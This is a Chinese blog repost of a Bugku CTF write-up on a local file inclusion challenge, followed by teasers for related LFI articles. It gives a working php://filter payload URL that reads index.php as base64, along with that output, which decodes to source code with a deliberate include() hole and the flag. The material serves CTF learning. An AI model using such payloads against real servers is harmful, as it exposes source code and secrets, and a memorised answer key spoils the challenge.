2. 程式人生 > >bugku-flag在index裡(本地檔案包含漏洞+php偽協議)

bugku-flag在index裡(本地檔案包含漏洞+php偽協議)

阿新 發佈:2018-11-25

題目地址http://123.206.87.240:8005/post/

click點選進去

從 url地址可以猜測,需要用到 php://filter偽協議

用法:

php://filter/read=convert.base64encode/resource=[檔案路徑]

含義:

        php://filter是一種元封裝器,設計用於"資料流開啟"時的"篩選過濾"應用,對本地磁碟檔案進行讀寫。簡單來講就是可以在執行程式碼前將程式碼換個方式讀取出來,只是讀取,不需要開啟 allow_url_include;

 

因此本題答案為:

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

base64解碼即可得到flag。

相關推薦

bugku-flag在index(本地檔案包含漏洞+php協議)

題目地址http://123.206.87.240:8005/post/ click點選進去 從 url地址可以猜測,需要用到 php://filter偽協議。 用法: php://filter/read=convert.base64encode/resourc

phpMyAdmin 4.0.1--4.2.12 本地檔案包含漏洞(CVE-2014-8959)

利用條件: 1.登入phpmyadmin後臺 2.需要截斷 滿足第二個條件  php版本必須 <5.3.4  搭建環境 我們在www目錄下放置phpinfo.txt 和 phpadmin4.0.3 phpmya

本地檔案包含漏洞詳解

0x00:漏洞定義 在通過伺服器指令碼的函式引入檔案時,由於傳入的檔名沒有經過合理的校驗,從而操作了預想之外的檔案,導致意外的檔案洩露、惡意程式碼的注入等。 檔案包含分為兩種,一種為本地檔案包含,一種為遠端檔案包含,此篇記錄本地檔案包含。本地檔案包含(Local File

對眾多知名公司造成影響的Oracle Responsys本地檔案包含漏洞

今天我要向大家展示的是,我如何發現了Oracle Responsys雲服務系統中的一個本地檔案包含漏洞(LFI)。由於當前很多商業銷售、網路儲存和社交關係公司都採用了Oracle Responsys的雲解決方案,所以,該漏洞對多個知名公司服務造成影響,這些公司包括Facebook、Linkedin、

Elasticsearch 核心外掛Kibana 本地檔案包含漏洞分析(CVE-2018-17246)

不久前Elasticsearch釋出了最新安全公告, Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console外掛存在嚴重的本地檔案包含漏洞可導致拒絕服務攻擊、任意檔案讀取攻擊、配合第三方應用反彈SHELL攻擊,下文筆者對其漏洞背景、攻擊原理和行為進行分析和復現。

Bugku–flag在index本地檔案包含)writeup

這道題目裡有經典的本地檔案包含漏洞+php偽協議的結合應用 點選後 注意到url地址  http://120.24.86.145:8005/post/index.php?file=show.php 這是一個典型的檔案包含漏洞,(file關鍵字是提示,

bugku-檔案包含2(檔案包含漏洞)

本文介紹三種方法,還會講到這道題菜刀的連線。  進入題目頁面,沒有什麼特別的,只能右鍵檢視原始碼,發現提示需要跳轉到 upload.php上傳頁面     方法一: ①新建一個txt檔案寫入  <script l

php://filter(檔案包含漏洞利用)

 檔案包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 篩選過濾應用:  1、 字串過濾器: string.rot13 對字串執行ROT13轉換 string.to

php檔案包含漏洞(利用phpinfo)復現

 利用docker復現該漏洞,訪問http://192.168.80.156:8080/phpinfo.php,可以看到頁面出現phpinfo頁面 再訪問http://192.168.80.156:8080/lfi.php?file=/etc/passwd,可以看到該頁面是存在檔案包含漏洞的。

PHP檔案包含漏洞攻防實戰(allow_url_fopen、open_basedir)

摘要 PHP是一種非常流行的Web開發語言,網際網路上的許多Web應用都是利用PHP開發的。而在利用PHP開發的Web應用中,PHP檔案包含漏洞是一種常見的漏洞。利用PHP檔案包含漏洞入侵網站也是主流的一種攻擊手段。本文對PHP檔案包含漏洞的形成、利用技巧及防範進行了詳細的

web安全————PHP安全之檔案包含漏洞

    PHP安全問題     PHP由於靈活的語法成為目前非常流行的WEB開發語言,應用非常廣泛。也是由於這個特點讓PHP給安全工作帶來了一些困擾。下面討論PHP自身的語言問題。     檔案包含漏洞:     檔案包含漏洞也是程式碼注入的一種,程式碼注入的原理是注入一段

PHP漏洞全解————10、PHP檔案包含漏洞

基本相關函式<>php中引發檔案包含漏洞的通常是以下四個函式:reuqire() 如果在包含的過程中有錯,比如檔案不存在等,則會直接退出,不執行後續語句。include() 如果出錯的話,只會提出警告,會繼續執行後續語句。require_once() 和 incl

18.phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613)

phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613) phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯, 通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 受影響版本: phpMyAdmin 4.8.0和4

BugkuCTF檔案包含漏洞

雖然是參考別人的,但是,為了能夠靈活使用工具啥的,拓展一下還是每天來一題CTF吧。 writeup正版點這裡 題目所給的程式碼塊 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "va

檔案包含漏洞原理

什麼是檔案包含漏洞: PHP檔案包含漏洞的產生原因是在通過PHP的函式引入檔案時,由於傳入的檔名沒有經過合理的校驗,從而操作了預想之外的檔案,就可能導致意外的檔案洩露甚至惡意的程式碼注入。最常見的就屬於本地檔案包含(Local File Inclusion)漏洞了。 程式開發人員一般會把重複

檔案包含漏洞詳解

原文作者: m4r10 http://hi.baidu.com/m4r10 轉載請註明版權 &&&遠端檔案包含漏洞&&& 一、 什麼才是"遠端檔案包含漏洞"?回答是:伺服器通過php的特性(函式)去包含任意檔案時,由於要包含的這個檔案來源過

Kali學習筆記31:目錄遍歷漏洞檔案包含漏洞

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   目錄遍歷漏洞: 應用程式如果有操作檔案的功能,限制不嚴格會導致可以訪問到WEB目錄意外的檔案 目錄遍歷漏洞和檔案包含漏洞本質以及利用方法一

【root-me CTF練習】Web伺服器安全-本地檔案包含-雙重編碼

靶機地址 http://challenge01.root-me.org/web-serveur/ch45/ 解題思路 通過構造測試連結發現,這關也是通過include函式包含的,並且檔名自動加上.inc.php,而這個版本的php是無法使用%00也就是null位元組

【root-me CTF練習】Web伺服器安全-本地檔案包含

靶機地址 http://challenge01.root-me.org/web-serveur/ch16/ 解題思路 通過點選網站上的不同板塊,可以看到可根據不同目錄讀取相應的檔案內容,如以下連結讀取sysadm目錄裡的index.html檔案內容。 http://

BugkuCTF(1)檔案包含漏洞

雖然是參考別人的,但是,為了增強下記憶力,順便督促自己天天做題,還是每天來一題CTF吧。 writeup正版點這裡 題目所給的程式碼塊 <?php include "flag.php"; $a = @$_REQUEST['hello'];